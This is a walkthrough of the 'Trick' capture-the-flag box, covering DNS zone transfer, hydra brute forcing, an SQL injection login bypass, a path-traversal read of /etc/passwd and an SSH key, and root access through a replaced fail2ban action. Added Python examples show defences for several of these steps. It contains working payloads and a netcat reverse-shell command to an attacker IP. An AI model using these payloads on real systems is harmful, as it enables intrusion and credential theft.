
Trick

Personal Rating: Medium

Enumeration

A more extensive nmap scan reveals interesting insights:

sudo nmap -A -p- -v <IP>

Discovered open port 80/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166

53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian

Host script results:
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
|_dns-brute: Can't guess domain of "10.10.11.166"; use dns-brute.domain script argument.

So a DNS Server is running on the box!

DNS AXFR Zone Transfer

I found a webserver on port 80, but was stuck there right at the beginning. After checking out the forum I found out that you had to guess the domain trick.htb. I added it to my hosts file and the IP to my resolv.conf as DNS server. Then I could perform an AXFR zone transfer for the domain trick.htb with the box as DNS server:

dig -t axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.4 <<>> -t axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 86 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Sat Jul 09 01:58:08 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

root.trick.htb seemed the same as 10.10.11.166:80, but preprod-payroll.trick.htb showed a PHP login page.
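As an added example (not part of the writeup), the dig output above fed through a small parser. A defender can run the same AXFR against their own nameserver from an external host and pass the result through it: every hostname it returns is information the zone is leaking to anyone who asks. The sample text is the page's own dig output, re-typed with spaces instead of tabs.

```python
# Sample copied from the writeup's dig run (tabs replaced by spaces).
AXFR_SAMPLE = """\
; <<>> DiG 9.18.4 <<>> -t axfr @10.10.11.166 trick.htb
;; global options: +cmd
trick.htb.              604800  IN  SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN  NS    trick.htb.
trick.htb.              604800  IN  A     127.0.0.1
trick.htb.              604800  IN  AAAA  ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb.              604800  IN  SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; XFR size: 6 records (messages 1, bytes 231)
"""


def parse_axfr(text):
    """Return (name, ttl, class, type, rdata) tuples from dig AXFR output.
    Lines starting with ';' are dig's own commentary, not records."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith(";"):
            continue
        parts = line.split()
        if len(parts) < 5:
            continue  # not a resource record line
        name, ttl, rclass, rtype = parts[0], int(parts[1]), parts[2], parts[3]
        records.append((name, ttl, rclass, rtype, " ".join(parts[4:])))
    return records


def disclosed_hostnames(records):
    """Hostnames an outsider learns from the transfer (owners of A/AAAA/CNAME)."""
    return sorted({r[0].rstrip(".") for r in records
                   if r[3] in ("A", "AAAA", "CNAME")})


def transfer_allowed(text):
    """dig prints an 'XFR size' summary only when the server served the zone;
    a refused transfer never reaches that line."""
    return ";; XFR size:" in text


if __name__ == "__main__":
    recs = parse_axfr(AXFR_SAMPLE)
    print("transfer allowed:", transfer_allowed(AXFR_SAMPLE))
    print("disclosed:", disclosed_hostnames(recs))
```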

Fuzzing the pages I had found revealed some PHP files. Most of them were not of interest though.

At users.php I found a supposed Administrator with the username Enemigosss.

I started an ssh bruteforce on that user with hydra, but to no avail:

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt preprod-payroll.trick.htb http-post-form "/ajax.php:username=^USER^&password=^PASS^&Login:Login failed, invalid username or password!" -V

I once again had to consult the forum and found out that you should find a third subdomain by guessing. I fuzzed for preprod-FUZZ.trick.htb and found preprod-marketing.trick.htb.

The SMTP port was a rabbit hole, by the way. I could enumerate users by connecting to port 25 with telnet, but nothing else was possible. Another way would have been hydra:

hydra smtp-enum://trick.htb:25/rcpt -L "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -p localhost

Manual SQLi

At http://preprod-marketing.trick.htb/login.php I performed some LFI testing and fuzzing, but didn't really find anything. The login page was susceptible to an SQLi though. After some testing I found a working payload:

x' OR '1' = '1'-- -
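To show why this payload works and what defeats it, an added example (not the box's code; the users table and its credentials are constructed) using sqlite3: the same lookup built by string formatting and as a parameterised query.

```python
import sqlite3

# The payload from the writeup, unchanged.
PAYLOAD = "x' OR '1' = '1'-- -"


def make_db():
    """Constructed stand-in for the payroll app's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('Enemigosss', 'correct-horse')")
    return con


def login_vulnerable(con, username, password):
    """String-built query. The quote in the input closes the string literal,
    OR '1' = '1' makes the WHERE clause true for every row, and '-- -'
    comments out the password check that follows."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(con, username, password):
    """Parameterised query: the driver sends the payload as a plain value,
    so it is compared against the username column and simply does not match."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("hardened:  ", login_hardened(db, PAYLOAD, "anything"))
```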

LFI w/ Filter Bypass

On the authenticated page an LFI was possible:

....//....//....//etc/passwd

As seen, a simple WAF evasion was necessary. Using the LFI I could then also retrieve the SSH key of the user michael:

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<SNIP>
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
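The `....//` trick survives a filter that strips `../` only once, which is the assumption behind this added example (not the box's code; the document root is a placeholder): the naive filter beside a resolver that canonicalises the path first and then confines it to the web root.

```python
import os

WEB_ROOT = "/var/www/html"  # assumed document root for the demo
PAYLOAD = "....//....//....//etc/passwd"  # the writeup's LFI input


def strip_traversal_once(user_path):
    """Naive filter (assumed): delete every '../' in one pass. str.replace
    does not rescan, so the '../' left behind by '....//' is never removed."""
    return user_path.replace("../", "")


def resolve_naive(user_path):
    """Filter first, then join: '....//....//....//etc/passwd' becomes
    '../../../etc/passwd' and escapes the web root."""
    return os.path.normpath(os.path.join(WEB_ROOT, strip_traversal_once(user_path)))


def resolve_hardened(user_path):
    """Canonicalise the joined path and reject anything outside WEB_ROOT.
    No blacklist of substrings: the check is on the final location.
    (Use os.path.realpath as well if the web root may contain symlinks.)"""
    full = os.path.normpath(os.path.join(WEB_ROOT, user_path))
    if os.path.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        return None
    return full


if __name__ == "__main__":
    print("naive   :", resolve_naive(PAYLOAD))
    print("hardened:", resolve_hardened(PAYLOAD))
```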

Fail2ban SUID Exploit

sudo -l reveals something:

(root) NOPASSWD: /etc/init.d/fail2ban restart

The command id also showed that the user was a member of the security group. I searched for files with permissions for that group and found the folder /etc/fail2ban/action.d owned by root:security.

The given permissions allow removing iptables-multiport.conf and replacing it with a custom one that executes /bin/nc ATTACKERIP 4444 -e /bin/bash when someone gets banned. The config file is reset by a cronjob every two minutes, and I have to send many requests in a short period of time to get banned, so I automated both with a bash script on the target and hydra on my machine:

rm /etc/fail2ban/action.d/iptables-multiport.conf
cp /home/michael/temp /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
nc -lnvp 4444
hydra -I -l root -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt <TARGETIP> -v ssh
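An added audit check (not from the writeup) for the misconfiguration used here: walk the fail2ban config tree and report anything group- or world-writable. fail2ban runs its actions as root, so a writable action.d combined with the sudo rule above is a root-equivalent path. The demo tree is a constructed temp directory mirroring the 0775 action.d on the box; a real audit passes /etc/fail2ban instead.

```python
import os
import stat
import tempfile


def writable_by_group_or_world(path):
    """True if the group or world write bit is set (lstat: do not follow symlinks)."""
    return bool(os.lstat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_fail2ban_tree(root):
    """Return every directory or file under root that a non-owner could modify.
    A writable directory is enough even when its files are 0644: the file can
    be unlinked and replaced, which is exactly what the rm/cp above does."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if writable_by_group_or_world(dirpath):
            findings.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            if writable_by_group_or_world(path):
                findings.append(path)
    return sorted(findings)


def build_demo_tree():
    """Constructed fixture: action.d is 0775 (root:security on the box),
    its iptables-multiport.conf is 0644, the parent is 0755."""
    base = tempfile.mkdtemp()
    action_d = os.path.join(base, "action.d")
    os.mkdir(action_d)
    conf = os.path.join(action_d, "iptables-multiport.conf")
    open(conf, "w").close()
    os.chmod(base, 0o755)
    os.chmod(action_d, 0o775)
    os.chmod(conf, 0o644)
    return base


if __name__ == "__main__":
    for finding in audit_fail2ban_tree(build_demo_tree()):
        print("writable by group/world:", finding)
```

The fix on a real host is to make action.d root:root 0755 (fail2ban needs no non-root writers there) and to drop the NOPASSWD restart rule, since restarting the service is what loads the replaced action.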

Finding the corresponding config file and working out what it does under which conditions was hard for me. I must say I really disliked the fact that you had to guess domains here. But during a real external pentest this might be required and more obvious, so I should expect it next time.

